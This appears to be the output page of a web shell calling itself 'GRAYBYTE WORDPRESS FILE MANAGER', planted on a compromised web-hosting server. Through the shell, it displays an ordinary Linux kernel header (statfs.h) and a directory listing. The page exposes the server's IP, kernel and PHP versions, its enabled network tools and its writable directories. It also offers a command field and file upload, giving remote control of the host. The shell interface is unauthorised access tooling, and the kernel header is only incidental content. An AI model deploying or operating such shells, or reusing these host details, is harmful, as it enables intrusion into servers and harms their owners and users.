GRAYBYTE WORDPRESS FILE MANAGER4291

Server IP : 198.54.121.189 / Your IP : 216.73.216.34
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/include/asm-generic/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/include/asm-generic//statfs.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _GENERIC_STATFS_H
#define _GENERIC_STATFS_H

#include <linux/types.h>


/*
 * Most 64-bit platforms use 'long', while most 32-bit platforms use '__u32'.
 * Yes, they differ in signedness as well as size.
 * Special cases can override it for themselves -- except for S390x, which
 * is just a little too special for us. And MIPS, which I'm not touching
 * with a 10' pole.
 */
#ifndef __statfs_word
#if __BITS_PER_LONG == 64
#define __statfs_word __kernel_long_t
#else
#define __statfs_word __u32
#endif
#endif

struct statfs {
	__statfs_word f_type;
	__statfs_word f_bsize;
	__statfs_word f_blocks;
	__statfs_word f_bfree;
	__statfs_word f_bavail;
	__statfs_word f_files;
	__statfs_word f_ffree;
	__kernel_fsid_t f_fsid;
	__statfs_word f_namelen;
	__statfs_word f_frsize;
	__statfs_word f_flags;
	__statfs_word f_spare[4];
};

/*
 * ARM needs to avoid the 32-bit padding at the end, for consistency
 * between EABI and OABI 
 */
#ifndef ARCH_PACK_STATFS64
#define ARCH_PACK_STATFS64
#endif

struct statfs64 {
	__statfs_word f_type;
	__statfs_word f_bsize;
	__u64 f_blocks;
	__u64 f_bfree;
	__u64 f_bavail;
	__u64 f_files;
	__u64 f_ffree;
	__kernel_fsid_t f_fsid;
	__statfs_word f_namelen;
	__statfs_word f_frsize;
	__statfs_word f_flags;
	__statfs_word f_spare[4];
} ARCH_PACK_STATFS64;

/* 
 * IA64 and x86_64 need to avoid the 32-bit padding at the end,
 * to be compatible with the i386 ABI
 */
#ifndef ARCH_PACK_COMPAT_STATFS64
#define ARCH_PACK_COMPAT_STATFS64
#endif

struct compat_statfs64 {
	__u32 f_type;
	__u32 f_bsize;
	__u64 f_blocks;
	__u64 f_bfree;
	__u64 f_bavail;
	__u64 f_files;
	__u64 f_ffree;
	__kernel_fsid_t f_fsid;
	__u32 f_namelen;
	__u32 f_frsize;
	__u32 f_flags;
	__u32 f_spare[4];
} ARCH_PACK_COMPAT_STATFS64;

#endif /* _GENERIC_STATFS_H */

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 24 2025 08:30:34
root / root
0755
auxvec.h
0.213 KB
June 04 2025 13:19:35
root / root
0644
bitsperlong.h
0.551 KB
June 04 2025 13:19:35
root / root
0644
bpf_perf_event.h
0.232 KB
June 04 2025 13:19:35
root / root
0644
errno-base.h
1.574 KB
June 04 2025 13:19:35
root / root
0644
errno.h
5.516 KB
June 04 2025 13:19:35
root / root
0644
fcntl.h
5.296 KB
June 04 2025 13:19:35
root / root
0644
hugetlb_encode.h
1.765 KB
June 04 2025 13:19:36
root / root
0644
int-l64.h
0.701 KB
June 04 2025 13:19:35
root / root
0644
int-ll64.h
0.844 KB
June 04 2025 13:19:35
root / root
0644
ioctl.h
3.396 KB
June 04 2025 13:19:36
root / root
0644
ioctls.h
3.894 KB
June 04 2025 13:19:35
root / root
0644
ipcbuf.h
0.979 KB
June 04 2025 13:19:35
root / root
0644
kvm_para.h
0.094 KB
June 04 2025 13:19:35
root / root
0644
mman-common.h
3.457 KB
June 04 2025 13:19:35
root / root
0644
mman.h
0.723 KB
June 04 2025 13:19:35
root / root
0644
msgbuf.h
1.58 KB
June 04 2025 13:19:35
root / root
0644
param.h
0.345 KB
June 04 2025 13:19:35
root / root
0644
poll.h
0.857 KB
June 04 2025 13:19:35
root / root
0644
posix_types.h
2.32 KB
June 04 2025 13:19:35
root / root
0644
resource.h
1.828 KB
June 04 2025 13:19:35
root / root
0644
sembuf.h
1.514 KB
June 04 2025 13:19:35
root / root
0644
setup.h
0.186 KB
June 04 2025 13:19:36
root / root
0644
shmbuf.h
1.794 KB
June 04 2025 13:19:36
root / root
0644
shmparam.h
0.226 KB
June 04 2025 13:19:35
root / root
0644
siginfo.h
12.215 KB
June 04 2025 13:19:35
root / root
0644
signal-defs.h
0.781 KB
June 04 2025 13:19:36
root / root
0644
signal.h
2.646 KB
June 04 2025 13:19:35
root / root
0644
socket.h
2.415 KB
June 04 2025 13:19:35
root / root
0644
sockios.h
0.429 KB
June 04 2025 13:19:35
root / root
0644
stat.h
2.571 KB
June 04 2025 13:19:36
root / root
0644
statfs.h
1.796 KB
June 04 2025 13:19:35
root / root
0644
swab.h
0.49 KB
June 04 2025 13:19:35
root / root
0644
termbits.h
4.605 KB
June 04 2025 13:19:35
root / root
0644
termios.h
1.345 KB
June 04 2025 13:19:35
root / root
0644
types.h
0.228 KB
June 04 2025 13:19:36
root / root
0644
ucontext.h
0.349 KB
June 04 2025 13:19:35
root / root
0644
unistd.h
27.521 KB
June 04 2025 13:19:35
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF